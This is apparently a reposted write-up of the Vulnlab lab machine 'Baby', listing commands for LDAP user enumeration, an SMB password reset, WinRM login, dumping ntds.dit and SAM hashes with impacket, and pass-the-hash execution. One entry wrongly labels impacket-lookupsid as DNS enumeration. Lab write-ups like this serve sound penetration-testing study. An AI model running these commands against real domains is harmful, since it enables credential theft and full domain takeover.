Exploiting LDAP and SMB for Privilege Escalation in Vulnlab Machine: Baby

By /

Listen to this Post

Overview:

  • Enumeration:
    The tester employed LDAP queries to extract domain users and conducted username mutations to facilitate credential stuffing attempts.
  • Initial Foothold:
    The tester identified an account marked with the `STATUS_PASSWORD_MUST_CHANGE` flag. Subsequently, the tester utilized the `smbpasswd` command to reset the password, thereby gaining access through both SMB and WinRM protocols.
  • Privilege Escalation:
    The tester exploited copies to retrieve ntds.dit, utilized `impacket-secretsdump` to obtain the Administrator’s hash, and eventually gained full control over the system.

You Should Know:

1. LDAP Enumeration Commands:

ldapsearch -x -h <domain_controller> -b "dc=example,dc=com" "(objectClass=user)"

This command queries the LDAP server for user objects within the specified domain.

2. SMB Password Reset:

smbpasswd -r <domain_controller> -U <username>

Use this command to reset a user’s password on an SMB server.

3. WinRM Access:

evil-winrm -i <target_ip> -u <username> -p <password>

This command allows you to access a Windows machine via WinRM using compromised credentials.

4. Extracting NTDS.dit:

impacket-secretsdump -ntds <ntds_path> -system <system_path> LOCAL

This command extracts hashes from the `ntds.dit` file, which contains Active Directory data.

5. Privilege Escalation with Impacket:

impacket-psexec <username>@<target_ip> -hashes <lm_hash>:<nt_hash>

This command allows you to execute commands on a remote system using extracted hashes.

What Undercode Say:

In this article, we explored how to exploit LDAP and SMB vulnerabilities to gain initial access and escalate privileges on a target system. The use of tools like ldapsearch, smbpasswd, and `impacket-secretsdump` highlights the importance of understanding both enumeration and exploitation techniques in penetration testing. Below are additional commands that can be useful in similar scenarios:

  • Enumerate SMB Shares:
    smbclient -L //<target_ip> -U <username>
  • Dump SAM Database:
    impacket-secretsdump -sam <sam_path> -system <system_path> LOCAL
  • Pass-the-Hash Attack:
    impacket-wmiexec -hashes <lm_hash>:<nt_hash> <username>@<target_ip>
  • Extract Kerberos Tickets:
    impacket-getTGT -dc-ip <domain_controller> <domain>/<username>:<password>
  • Enumerate DNS Records:
    impacket-lookupsid <username>@<target_ip>

These commands and techniques are essential for anyone looking to deepen their understanding of Windows-based penetration testing and privilege escalation. Always ensure you have proper authorization before performing any of these actions on a target system.

References:

Reported By: Thienle2208 Vulnlab – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

Whatsapp
TelegramFeatured Image

Related Posts: